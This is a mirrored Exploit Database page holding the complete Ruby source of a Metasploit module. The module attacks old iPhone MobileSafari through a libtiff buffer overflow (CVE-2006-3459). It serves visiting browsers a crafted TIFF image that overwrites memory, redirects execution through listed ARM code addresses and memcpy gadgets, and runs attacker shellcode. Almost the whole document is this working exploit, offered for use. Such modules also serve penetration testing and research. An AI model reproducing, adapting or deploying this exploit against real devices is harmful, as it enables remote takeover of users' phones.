Apple iPhone MobileSafari LibTIFF – ’email’ Remote Buffer Overflow (Metasploit) (2)

• Exploit Database
• 156 阅读

• 作者： Metasploit
  日期： 2010-09-20
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/16868/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162

  ## # $Id: safari_libtiff.rb 10394 2010-09-20 08:06:27Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking   # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;iPhone MobileSafari LibTIFF Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; =>[&apos;hdm&apos;, &apos;kf&apos;], &apos;Version&apos;=> &apos;$Revision: 10394 $&apos;, &apos;References&apos; => [ [&apos;CVE&apos;, &apos;2006-3459&apos;], [&apos;OSVDB&apos;, &apos;27723&apos;], [&apos;BID&apos;, &apos;19283&apos;] ], &apos;Payload&apos;=> { &apos;Space&apos;=> 1800, &apos;BadChars&apos; => "" }, &apos;Targets&apos;=> [   [ &apos;MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)&apos;, { &apos;Platform&apos; => &apos;osx&apos;,   # Scratch space for our shellcode and stack &apos;Heap&apos; => 0x00802000,   # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib &apos;Magic&apos;=> 0x300d562c, } ], ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Aug 01 2006&apos; )) end   def on_request_uri(cli, req) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil)   # Grab reference to the target t = target   print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")   # Transmit the compressed response to the client send_response(cli, generate_tiff(p, t), { &apos;Content-Type&apos; => &apos;image/tiff&apos; })   # Handle the payload handler(cli) end   def generate_tiff(code, targ)   # # This is a TIFF file, we have a huge range of evasion # capabilities, but for now, we don&apos;t use them. #- https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday #   lolz = 2048 tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+ "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+ "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+ "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+ "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+ [lolz].pack("V") + "\x84\x00\x00\x00\x00\x00\x00\x00"   # Randomize the bajeezus out of our data hehe = rand_text(lolz)   # Were going to candy mountain! hehe[120, 4] = [targ[&apos;Magic&apos;]].pack("V")   # >> add r0, r4, #0x30 hehe[104, 4] = [ targ[&apos;Heap&apos;] - 0x30 ].pack("V")   # Candy mountain, Charlie! # >> mov r1, sp   # It will be an adventure! # >> mov r2, r8 hehe[ 92, 4] = [ hehe.length ].pack("V")   # Its a magic leoplurodon! # It has spoken! # It has shown us the way! # >> bl _memcpy   # Its just over this bridge, Charlie! # This magical bridge! # >> ldr r3, [r4, #32] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #32] # >> ldr r3, [r4, #36] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #36] # >> ldr r3, [r4, #40] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #40] # >> ldr r3, [r4, #44] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #44]   # We made it to candy mountain! # Go inside Charlie! # sub sp, r7, #0x14 hehe[116, 4] = [ targ[&apos;Heap&apos;] + 44 + 0x14 ].pack("V")   # Goodbye Charlie! # ;; targ[&apos;Heap&apos;] + 0x48 becomes the stack pointer # >> ldmia sp!, {r8, r10}   # Hey, what the...! # >> ldmia sp!, {r4, r5, r6, r7, pc}   # Return back to the copied heap data hehe[192, 4] = [targ[&apos;Heap&apos;] + 196].pack("V")   # Insert our actual shellcode at heap location + 196 hehe[196, payload.encoded.length] = payload.encoded   tiff << hehe end   end